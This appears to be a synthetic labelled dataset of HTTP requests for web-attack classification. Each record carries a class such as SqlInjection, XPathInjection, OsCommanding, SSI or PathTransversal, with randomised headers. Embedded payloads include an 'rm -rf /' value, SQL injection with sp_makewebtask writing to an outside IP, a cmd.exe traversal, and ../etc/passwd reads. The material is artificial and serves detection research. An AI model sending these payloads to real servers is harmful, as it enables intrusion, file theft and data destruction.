hn=08000&rinsertIQXunionincludeW0E=7173293&nsnahoane=u&rnsi=06905076&Dechor7CYw_xk=`rm     -rf    /  `&1ngna9eiz=116&bhwQouIoo=6LSyb6z&iirix=lv\nx;r5&uuhacbumnirE=zjZaS@&and-zA8_-=EmbsW&whereZ2up8_K@IoQ=urFQkSv&servicesOFjQHjLZ=$c&k36bjcitole=sE3OAuLcH&0eunnJatges=nlzG

End - Id: 43047
Start - Id: 35896
class: XPathInjection
POST /document-OcmdZhtpassR.jpg? HTTP/1.1
Content-Length: 175
Content-Language: aoe
Content-Encoding: deflate
Content-Location: /rlCynh/gtjmes0o/un3EvEi/0msaIEjn/3uAneh.php4
Content-MD5: c25UUHNsOGkzVG5zaG5uZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Aug 08 15:33:10 CET
Last-Modified: Thu, 23 Sep 04 17:10:58 GMT
Host: 120.182.229.166
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: ipzeu'     or     1<     Snni3b/o/oaEea/child::text()[position()=0]     or     'Idh'    =  '
Accept-Language: ooeeo-e, e7n-g7po;q=0.5, tojsS-bojaiz;q=0.4, jaenm-xiwttowl;q=0.2, tetem-mi
Cache-Control: no-transform
Client-ip: 81.81.211.202
Cookie: oatisnyacn4=tDaz
Cookie2: $Version="92"
Date: Mon, 12 Feb 07 19:58:52 GMT
ETag: W/"jzK1LSEnifAIFXRw"
Expect: 100-continue
From: sloeldwe@xNeaihyz.uk
If-Modified-Since: Tue, 20 Oct 09 02:49:53 UTC
If-Unmodified-Since: Wed, 25 Oct 06 12:35:41 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Jan 06 21:56:06 GMT
Max-Forwards: 5196
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/aerIioNs/hklin/lnrxemt1.png
Authorization: Basic dWUwN2U6ZTJ0YjVzcg==
Range: -23690,93-568748,-273092
Referer: http://www.feIyte.gov/taIsNixp/oyumyd/yealqT/rfne.jpg
TE: gzip;q=0.4,deflate;q=0.2,gzip
Trailer: If-Modified-Since
User-Agent: pnen0lsle0 (tcXgB5; q58AnuiZHb; bja1zUhg)
UA-CPU: PowerPC
Via: 5.9 www.oiEfs.htm, HTTP/4.6 www.powntun.js
Transfer-Encoding: dEorai; ern2=nmonh
Upgrade: eriHhs/7.6, efsot/0.3, oHnr/4.8, d3rh/5.5, enaeO/2.1
Warning: 424 www.xto8ris.gif "1ioilnehhryaDn5sGe" "Sat, 21 Feb 04 10:37:48 GMT"
X-Forwarded-For: 174.27.30.162
X-Serial-Number: 503350081562336
----: -----------------------------------

3xItSlce0aqaqi=707643&lYYhh=203585&lSVI7t=oosvd&in5Rsa=30387699&zi=8nnx &1VL2acceptjgEZr=t_se5un&mLJ2CMCRncq=ildi&BuV@4rfSxzf-=0378753741&hht5masoqeh=tIhss&mANuhaKSkX7q=394573

End - Id: 35896
Start - Id: 43391
class: OsCommanding
GET /etcB3TFTsR/iPZ/zKWetCSYKJ5NbW.vmlcA/tnww/o5-A/bz/rUrgV6uS.Q4hasaqJi.html?EIZEscript5K=rm++-f+++++%2Ftmp%2Fathrlo%7C HTTP/1.1
Host: www.oeepotsGa.de
Connection: keep-alive
Accept: text/html;q=0.3
Accept-Charset: hz-gb-2312;q=0.5, windows-1252;q=0.8, big5;q=0.9, euc-kr, iso-8859-1
Accept-Encoding: compress, compress;q=0.2, gzip, compress, deflate
Accept-Language: sno5o-gemto;q=0.4, rhn-s
Cache-Control: tCate='hiy'
Client-ip: 143.76.65.70
Cookie: yshDcsma=3959454;ms=wheresamall;rDtwsy=nxterm;mgeve7i=1;wfsq=/oowv
Cookie2: $Version="5"
Date: Wed, 23 Mar 05 13:02:51 CET
ETag: W/"AMQ50BgW5OZswZc"
Expect: 100-continue
From: no4b@rasantepan.ch
If-Modified-Since: Thu, 18 Dec 08 11:50:24 UTC
If-Unmodified-Since: Sun, 08 Feb 09 23:59:20 CET
If-Match: "v8gUMR38inclouEVOl"
If-None-Match: *
If-Range: "szjWDGDpjNpSqr5Xr0"
Max-Forwards: 9963
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic dGJ2ZXJuajp0c3RvbTVj
Range: 640570-,-8
Referer: http://www.zv6a.cz/qrte/tYaBuo/rlaN0r.css
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 5.4; rl-a8; rv:7.2.6) Gecko/33953300
UA-CPU: StrongARM
UA-Disp: 400,542,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 5.9 161.28.182.43
Transfer-Encoding: identity
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43391
Start - Id: 39475
class: SSI
POST /dcr4/Sp/odpiyAa/n14VULFtkt/igL/g-/tipne/glstdin/rccr0veagmlhlhp0wda.gif? HTTP/1.0
Content-Length: 165
Content-Language: hhgsAei,3twn,iiv5n5n
Content-Encoding: compress
Content-Location: /bstoae/us1hE2cn/kcoTvu/noE5rn4/6cA8.avi
Content-MD5: eGJpYWluYWl0OHRUZ3V3bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Apr 05 17:38:33 CET
Last-Modified: Thu, 17 Aug 06 04:15:33 UTC
Host: 64.211.178.58
Connection: otnr
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.1
Accept-Language: <!--#echo var="date_gmt"-->
Cache-Control: only-if-cached
Client-ip: 81.231.57.32
Cookie: nccnaotwltlp1s=39414;oO=3;ctolIaa=Sh)cfroma;arnyozetnv=tit64hd664to;am=si8tdi7;hCSallVl5ol8d=img 
Cookie2: $Version="119"
Date: Fri, 12 May 06 22:51:49 CET
ETag: "8PwoW7p8zlPNodh4rj"
Expect: Baler
From: aru6@Ngoct.gov
If-Modified-Since: Sun, 06 Jul 08 04:00:59 CET
If-Unmodified-Since: Fri, 25 Nov 05 12:14:41 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 May 06 07:53:45 GMT
Max-Forwards: 66
Pragma: r='htg1'
Proxy-Authorization: NTLM c3JuaGxyRWR4b3R1aWh0cmFnd2FlYXQxVGRudG9yb3llZGxFc21vZGo2cA==
Authorization: NTLM SXJuNXRzZWFrSWhlbXJvaUFSaWh0MXR4UGVoZXR0dGUxd3VmYW90YXRw
Range: 97-,883452-
Referer: /k2Nrp9ek/ozs7b/dqbame.mspx
TE: trailers
User-Agent: Mozilla/4.5 (Windows; U; Win98 3.7; Sb-he; rv:5.9.6) Gecko/50147773
UA-CPU: Sparc
UA-Pixels: 8114x0121
Via: 4.8 www.Ogogb.js, 8.2 220.153.7.167, HTTP/9.7 189.239.163.107
Transfer-Encoding: gzip
Upgrade: xri/5.6, Roraar/4.8
Warning: 278 www.jsiw.gif "s3rSrrasncsnmaci" 
X-Forwarded-For: 255.162.171.217
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ocko=reSaua4se0ieathe&1annp1e9rSeeb=sd&zidKaGhalljV=ae<[&unedsisvsio=wbwanu9tn&ro1hsaetoiht=7ekttw73set2Ahe7&ensehdmiih0meor=3726682&eaG=s6te&paeshtjkinhc=16t51r

End - Id: 39475
Start - Id: 35868
class: XPathInjection
GET /-P37nph-W.js?hrte5soWi9w=%29h&att8=722&oqti=S&hiwut=update%3C&slCoso=rtcutralausa&bcopyW5wP=%24t%5Dfn&key4Cltpotrnde=3&ohmn7r4te=%3EhNydi&openCNlgI7T=hsStr%27+or++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+i%2B+j+++%2B+++k++++%2B++l%2B+++1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+%27eta%27++%3D+++%27++++b3snh3r%27+or&vtwneuhncdee=l8eGhihikmuoweokpn HTTP/1.0
Host: www.24sanT.org
Connection: close
Accept: image/*;q=0.1, audio/*
Accept-Charset: iso-8859-8-i, x-mac-roman;q=0.3, x-mac-arabic, isiri-3342
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: gsRhzde='dire'
Client-ip: 118.230.75.151
Cookie: hrrfizdso=thshutdownze rSsm;aie5=6etnie;f6cnNeatlSt=4337;iroErrn9Lem=httpt;xsfEn4leh=i509_FaN44H
Date: Sun, 30 Jul 06 24:28:38 GMT
ETag: "j6_RBDMJQV7b5lSDIfdF"
If-Modified-Since: Wed, 07 Jan 04 09:32:30 CET
If-None-Match: *
Max-Forwards: 322
Proxy-Authorization: Digest nonce
Authorization: NTLM ZnRlb2RyaHRlS2RhOWVzMGlhT29hYWFEd2EwSTk5ZXJpSFN0OGU3YnJzdGw=
Referer: http://todnc.st/4ennnd9w/ttctsdou/NnInxnaY/75lg1/tzrUb6.php
Trailer: Expect
User-Agent: hS9Ygb http://www.35ihL0rE.cz
Warning: 341 www.ei3igla.htm:804 "dheeeoo9Tztn" 

null

End - Id: 35868
Start - Id: 49010
class: XPathInjection
GET /atAOiQ-FNHnZSRph/aiEAY8On/lTq/8Ucinsertppbpasswd/cg06/ZlHcaKdhavingo4Jhj/PI8rF/_wZuaUKXmochaXpVVG/1MyB/JegkXl.nsf?ishdECI6sasdLst=wneud%27++or++++1%3C++++Yt%2Fccotsm%2Fh%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D58%5D+++or++%27cwda%27++++%3D%27 HTTP/1.0
Host: 249.249.72.154
Connection: 1iNiez
Accept: video/mpeg, image/*;q=0.4, image/png;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, compress, gzip, compress
Accept-Language: zui-nd, ohPeeLj-agd
Cache-Control: min-fresh=82
Client-ip: 219.107.221.160
Cookie: atIocsrtetdzEU=909;fsLXutmp%u@=002083899;winnt@Hnvar=l3-tSio+%3D+;Nktdntfr=tPT
Cookie2: $Version="22"
Date: Fri, 13 Apr 07 17:36:14 GMT
ETag: W/"A_OF1TsXBNTJNorCOij"
Expect: EtKttam=ESeh
From: w6wr@nytn.it
If-Modified-Since: Thu, 23 Apr 09 18:17:43 UTC
If-Unmodified-Since: Fri, 20 May 05 14:12:56 GMT
If-Match: "k@dnYl8d3xyUDeNHpV"
If-None-Match: *
If-Range: *
Max-Forwards: 39
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM aXNlcm54Q3Nsa2FvbmVOaWlvQWV0bG9uMXhqbHdvZTg=
Authorization: NTLM aXRpb2lzbmRubjJ1Nmdyb0k2ZWhicm5hYXllYW1pZnNyNmllbDBsdHR0b2Vv
Range: -31
Referer: /d7ex75/10dbiw/adey/asieeadi.htm
TE: deflate,deflate
Trailer: From
User-Agent: Mozilla/4.2 (X11; U; SunOS sun4u 7.0; vb-oT; rv:4.5.3) Gecko/00173579
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4125x649
Via: FTP/5.6 70.77.47.39
Transfer-Encoding: deflate
Upgrade: meeoe/8.2, nir2fe/4.3, eS7e/1.8, nerHu/7.3
Warning: 125 125.176.168.201:2566 "ssenlreskycm" "Fri, 09 Mar 07 06:42:35 CET"
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49010
Start - Id: 40997
class: SqlInjection
POST /eMwznattbSmyrtnnhes/eTVSt1X/vN2eOOqDrRuU/_D3autoexecQxFr3nQOWEN/eoqa0eo7t/a23nryttill5i/rifosTnyneirsns/FL2W8DrgexecBIOW2/iVwXbaDtLE_VJYET/aHrehnteRsp.php4? HTTP/1.1
Content-Length: 304
Content-Language: Oucy,ettampo
Content-Encoding: gzip
Content-Location: /1Lwn/2iii/hWht0Sa.nsf
Content-MD5: cnN5TmN1ZmhndHNvaWxwZA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 21 Mar 07 22:41:58 CET
Host: www.nh0o.de
Connection: keep-alive
Accept: image/png
Accept-Charset: hz-gb-2312
Accept-Encoding: deflate, compress, deflate;q=0.0, compress
Accept-Language: R4eenboe-nesfwde, aOxtcoe-Ih4, 3hHNh-ai, DeH1-aemEii;q=0.8, i-tlna26da
Cache-Control: no-cache
Client-ip: 248.121.203.33
Cookie: untrhuslrdea=c085tioe3htser;adctx=ge;.THuudkBT@L=wkiusrIb;arhaastsuNv=ejLP9PX_F-f9
Cookie2: $Version="889"
Date: Mon, 11 Jan 10 09:30:46 GMT
ETag: "vXvN5UnvPs4m@hSmv5"
Expect: 100-continue
If-Unmodified-Since: Sat, 01 May 04 21:34:38 CET
If-Match: *
If-None-Match: "bDO56@3M8lka6z_p-mb"
If-Range: Mon, 21 Dec 09 22:13:53 GMT
Max-Forwards: 975
MIME-Version: 8.3
Authorization: 9etso itrab=ohxvo2N
Referer: /NliiooeU/radsee/endr7s/ictiibr0/nenwo.ace
TE: chunked;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.3 (Machintosh; U; Mac OS X 0.0; ol-ky; rv:4.5.0) Gecko/50576467
UA-Pixels: 892x2342
Via: 9.5 211.185.137.236
Transfer-Encoding: gzip
X-Forwarded-For: 181.40.75.124

aaeNaeebm=U5jmafd&msaHpvr=38068409&qvOcwTem=20048174&my=615211&aelaeahsM=eyka2&Udrop9RgtgU=o6tts&5cuee2j=sbcjwhnnl&qlEshdbp=9ut'r&GNhhomeboot.iniR3=0&cbviQixb3Oa=';     EXEC master..sp_makewebtask    "\\237.112.50.111\8o\eal.jpg",  "SELECT    *     FROM INFORMATION_SCHEMA.TABLES"

End - Id: 40997
Start - Id: 42103
class: SqlInjection
GET /toUarnrH35isicIl/LDdcv2rsn/59ydreoirtiksdfu/oacgvopkuc-7ARvj-.jpg?LZVBvFRE=yEgZOkPb&no3ieu=ty47iniusiOa1eTu&Hziiannml7Sr=%27%3B++insert++++into+++ceetsh9w+++values%28666%2C%27beif%27%2C%27Eensh5r0%27%2C0xfffff%29&trwTdplenm8eeW=4841431677&NoeTS5=403204406&re0=9hNl&c7pTjoeeitxkop=ciEo%40&edrwsnToTeah=processing-instruction&ysotAoeugas1=I%3Coeb&tepeeEatoefccio=9a%24cs&arror1Euhtt4t5=%27ejmmGas&0edtwE=5&i6tae8etRt3=36132193&0gi=x+Oscriptw4aaumx HTTP/1.1
Host: www.z9xmDr.be
Connection: uaohra9n
Accept: image/*;q=0.0, text/plain;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ijuus-ebdk, na1th-eg;q=0.6, AnDeza-gvpga;q=0.5, n-uoht3e;q=0.0, efofer-s
Cache-Control: only-if-cached
Client-ip: 139.71.160.209
Cookie: mNVnW9vsock_stream=|s;said1r=T<;_EErHNhJg_@G=312;et2yyrsiiecda=techoe;SYnS3=7500408149;YlikeTq=wnhIF
Cookie2: $Version="787"
Date: Fri, 06 Feb 04 13:50:16 CET
ETag: W/"D83eFbifPOT4iL7"
Expect: elzgh
From: LzmxnseS@evezd.fr
If-Modified-Since: Thu, 23 Aug 07 12:00:53 CET
If-Unmodified-Since: Tue, 02 May 06 15:29:32 GMT
If-Match: "w149LuXKoUQYVAS"
If-None-Match: *
If-Range: *
Max-Forwards: 5279
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Digest realm
Range: -824,-58,-460
Referer: http://www.4e2ey.biz/eowislAj/aHa4/rO4fsht4.msf
TE: trailers,gzip
Trailer: User-Agent
User-Agent: mh7mde (uiqeocN; 1AaEYv5W; ikbmvLnoNh)
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: deflate
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 67.134.243.28
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42103
Start - Id: 39279
class: SSI
GET /tUO5gbEzf/eccc9dPje35VM-IDZ/1ww50hvERzUtNrA_F/rExhTo@.mspx?meo7aw6Ernp0=%3C%21--%23email+fromhost%3D%22www.dd2Aba.com%22+tohost%3D%22mailbox.e67i.com%22+message%3D%22s7s9sp+rdanbLn+edbb+i6q%22+fromaddress%3D%22cmforv.com%22+toaddress%3D%22nwydb.aoxbf.com%22+subject%3D%22as%22+sender%3D%22tn.com%22+replyto%3D%22xriDi.com%22+cc%3D%22sph%22+inreplyto%3D%22sl+eo3+e8inH%22+id%3D%22wlmail%22+--%3E&tgrlfougbiosDwy=637 HTTP/1.1
Host: 174.251.56.246
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-2022-jp;q=0.1, x-mac-icelandic;q=0.3
Accept-Encoding: compress;q=0.3, deflate;q=0.9, gzip;q=0.5, deflate
Accept-Language: *
Cache-Control: min-fresh=0953
Client-ip: 124.35.102.241
Cookie: ol=8e
Cookie2: $Version="26"
Date: Fri, 10 Jun 05 07:20:10 GMT
ETag: W/"7PpJzZ6D.Le.Qph7"
Expect: 100-continue
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 18 Sep 07 18:48:48 CET
If-Unmodified-Since: Thu, 25 Nov 04 16:26:48 GMT
If-Match: *
If-None-Match: "YJ6_IBEgLCAuFLCve"
If-Range: Thu, 04 Mar 04 02:49:47 GMT
Max-Forwards: 901
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: NTLM dEVldWpycHRvZW50ZXpicHNtZXN4b2Vpdm50bjdobmFidQ==
Range: -219632,263179-06080,264504-7
Referer: http://www.Mtevt.biz/tkdeNnm/a3st/iO0hr6/hoaA.nsf
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/5.2 (X11; U; SunOS sun4u 1.4; OH-Tg; rv:1.2.0) Gecko/74754034
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 320x017
Via: FTP/9.9 www.neel.jpeg
Transfer-Encoding: deflate
Upgrade: dde/7.5
Warning: 372 www.exhwh.jpeg "h0t3bfwddlgralo9" "Thu, 10 Jun 04 17:14:38 UTC"
X-Forwarded-For: 190.235.131.102
X-Serial-Number: 420641623640
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39279
Start - Id: 35233
class: SqlInjection
GET /.openmail.k/dze5atqfhamTcoaomcq/UU/sVY2_/g@4@4mrIaldULGu@xMX/yaetxwEoosu/C9nZn8JFpzJ3Fupdate/ddsrp8/ekv18Lr1stylemailDMyhtaccesk/7h9x8PF3HhyNPL..jsp?cootg6e5ol=047554&oyqa10on=iGN_RGzZJ&eg7GynfonrmstId=ai%3E&lidrhtnn54laR=r%7E%3Auetu06&dpoane2ul=%27%29++UNION++++ALL+SELECT+++oeyn++FROM+++++jdnpndsnat+++WHERE+++++%28++%27%27++%3D%27&ie2=3325855&trh=543191 HTTP/1.1
Host: www.lo7i.it
Connection: close
Accept: */*
Accept-Charset: iso-8859-1, iso-8859-15;q=0.2
Accept-Encoding: *
Accept-Language: uh-sr6dst, s-deueraqh, Me-lth90d;q=0.0
Cache-Control: max-age=6
Client-ip: 61.19.198.20
Cookie: sgv9d6cmnd=swci4syii;dhmooo=9319656;bwstcno=exi
Cookie2: $Version="55"
Date: Sun, 11 Dec 05 09:32:55 UTC
ETag: W/"bFb127kl2ale7r@.kL9"
Expect: 100-continue
From: oeeetot@ecjsbsx.org
If-Modified-Since: Thu, 18 Dec 08 01:53:35 CET
If-Unmodified-Since: Fri, 06 Jun 08 12:51:42 UTC
If-Match: *
If-None-Match: "FrM9gcMispPKjG-cy"
If-Range: Tue, 31 Jan 06 23:25:19 GMT
Max-Forwards: 16
MIME-Version: 1.1
Pragma: cusnt=cde0tptk
Proxy-Authorization: Basic UmxkaXJ0OjNlaXU=
Authorization: rnger ncT9l=sruax5
Range: -2,109-7
Referer: /ranlpojg.asp
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: rlfe/3.5.6
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: dCso/0.4 www.O5odmit.jpeg, 5.5 www.nio85.jpeg:83
Transfer-Encoding: deflate
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 253.219.42.72
X-Serial-Number: 514695691907
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35233
Start - Id: 36481
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 230.225.195.54:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: cp-936;q=0.6, iso-2022-kr, ks_c_5601-1987
Accept-Encoding: gzip;q=0.9, gzip;q=0.0
Accept-Language: idw-mAnrew, wRmoso-bi, newRlca-o, rvoti8m-c1euezWs, eleai2-Gsragaso;q=0.3
Cache-Control: min-fresh=723
Client-ip: 221.93.140.194
Cookie: fttn4ar7aam=smt+>;o1nploqineho=11;e8aserfzOhtcaei=t l1eilikeqoixwe;namhe=00;hsoeorvnkeaEndo=gway9ru;KSrLGO=q
Cookie2: $Version="984"
Date: Sat, 17 Feb 07 23:31:10 GMT
ETag: "EEjfH1qoZefe@m2kmR"
Expect: diruIijb=qjnt
From: n8us@72HjX.ch
If-Modified-Since: Fri, 02 Jan 09 04:51:22 CET
If-Unmodified-Since: Fri, 25 Feb 05 15:09:57 UTC
If-Match: *
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Fri, 25 Apr 08 10:27:49 GMT
Max-Forwards: 4578
MIME-Version: 9.8
Pragma: r='1dAraae'
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: Basic MnJ1eHptN2U6dG1ha3NldDU=
Range: 998505-,-0540,815-
Referer: /edafdie.cfm
TE: gzip;q=0.2
Trailer: Authorization
User-Agent: uelmtnr4e/4.2.2.1
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: HTTP/7.5 www.ahnp.jpeg, 9.6 www.2mbeo.htm:84, 0.0 89.108.133.114
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36481
Start - Id: 45888
class: PathTransversal
GET /Nmwsjel6/ujt@k194j6n.pl?KVBc6etcDce6F=ebg%40Z5nef3&poe=gn&nuVee=3150&owl=s%3A%5Cautoexec.bat&2u=%40eu&sT0whi=99&ngf=qmJ-boBIj&Na2phlhlfsaho4=nth3&rt7opb=eImhvEt&LLhaving8jWBS=068&iuiAfu9t=083&-3wFretc=tovahR1 HTTP/1.1
Host: 119.68.98.95
Connection: bLdxixme
Accept: audio/*;q=0.1, audio/x-wav, audio/*;q=0.3
Accept-Charset: x-mac-turkish;q=0.4, koi8;q=0.2, x-mac-ce;q=0.1, shift_jis, x-mac-ce;q=0.3
Accept-Encoding: compress;q=0.5, gzip, compress;q=0.9, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 16.13.223.78
Cookie: xzniHaniee=92;biucl=ok4C7I;oYoNc=open$6R;ntgsAUe3=ehO;gOK7ncr4C.Z9G=dx
Cookie2: $Version="33"
Date: Thu, 14 Oct 04 20:52:16 UTC
ETag: W/"@9PfQx8cIAjptFMfc"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Sat, 27 Mar 04 01:55:03 CET
If-Unmodified-Since: Thu, 01 Nov 07 13:43:47 CET
If-Match: "YjPVrmyfY.f2_wnQPW2-"
If-None-Match: "iQ4joX.SwtlLrsnm1I"
If-Range: Sun, 04 Jun 06 01:21:45 GMT
Max-Forwards: 59
MIME-Version: 5.1
Pragma: q=naa
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: RsBe h3em=leSos5t
Range: 58-182597,4-9
Referer: /Wawoci/dn4se/nteith.nsf
TE: trailers
Trailer: TE
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 3.5; Si-As; rv:8.2.4) Gecko/78901049
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: pqirj
Upgrade: srd/2.1, trlx/7.5, fh7e/2.0, xDtero/2.4
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45888
Start - Id: 45704
class: PathTransversal
GET /sia1nWhfodtinhww/ehecei/8exeas3teTicohDvt/dmiaaguuswa/h6_t/de7dnrue/sUDfP/trt370odbCthgoievo/tlduanlei/lraosoen9ihlteOieew/ilK_F5S.agsm7.exe?fmimgwf3Op=%5CWINDOWS%5Csystem.ini&nfOhaiwmny=cl%3Al+hinsertm%7EI+4H HTTP/1.1
Host: www.toadn4otL.biz
Connection: nirf0h
Accept: video/quicktime;q=0.1, audio/basic;q=0.5
Accept-Charset: x-mac-chinesesimp;q=0.1, shift_jis;q=0.2, x-mac-chinesetrad;q=0.1, iso-8859-2;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 8.138.141.106
Cookie: ete4nes=a;edRu4tiogis=cc6Ystrgmerw
Cookie2: $Version="32"
Date: Wed, 14 Oct 09 23:43:48 GMT
ETag: "2j2pLmGkE8-lE0K5GK"
Expect: natos=yxma8O;hfnxts
From: eajtut@smge.gov
If-Modified-Since: Sun, 23 Apr 06 15:47:38 CET
If-Unmodified-Since: Mon, 17 Apr 06 14:47:18 GMT
If-Match: *
If-None-Match: "uCmYFFYx004KMs_I-TE"
If-Range: *
Max-Forwards: 71
MIME-Version: 5.2
Pragma: as='en7p'
Proxy-Authorization: Digest realm
Authorization: Basic ZXJzemU6NGVlZDBl
Range: -934,-807,-703421
Referer: http://www.dLa4t.org/ecsAra/etlkte7.mp3
TE: chunked;q=0.9,trailers
Trailer: Cache-Control
User-Agent: skjV_C6_s8 http://www.5d6e.net
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6938x271
Via: HTTP/8.6 www.rr8w.css, 0.1 186.99.51.155
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45704
Start - Id: 46380
class: PathTransversal
GET /4i4boot.ini7D5KincludeysIAstdin/l@yYxYI/oPotVTFh4B6kzpt/nF38.YnEOO/.Sz@access_logOOnYujpAO/sRhwOg5uE2t.N-RFrxp.cgi?AGcZ5CUservicest4=91674&4gshy=57&vlrrtdnu=tfn+accno%7Cevali-nsd&G6_OEUV=efoOF-r9GmM&RQdRrg6b=hSy1%2FH9Hthttp&GGsock_streamg9g=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&8C70s5T1=reanm+rcws4urw&7ntirewonssette=tAo%3Fmixml7cn+a%27%5Btdim8o&harwbOW2=h HTTP/1.1
Host: www.rcney.fr
Connection: keep-alive
Accept: video/quicktime;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: compress, identity;q=0.8, deflate, gzip;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 86.247.207.18
Cookie: Hsomh6btjsutS=f3B;tl5spfhalhenase=4window.openEa;nrzn=etalhrqlrmtm;as_pOYB6vincludeM=uk5PwE6NjrR;egegoenn=0ddoqrsf;X8lchildfounionJj=childnp
Cookie2: $Version="86"
Date: Thu, 04 Jan 07 17:47:54 UTC
ETag: "GFsg.faK@trgN@CsoV"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Thu, 05 Oct 06 16:33:05 GMT
If-Unmodified-Since: Mon, 28 May 07 04:30:42 GMT
If-Match: "CJUeT2Gb81.q09Uz."
If-None-Match: "5bMTjNrRklghvj6T@"
If-Range: "wNk.zC30bLAvh.Qwl"
Max-Forwards: 46
MIME-Version: 0.4
Pragma: Se='sm'
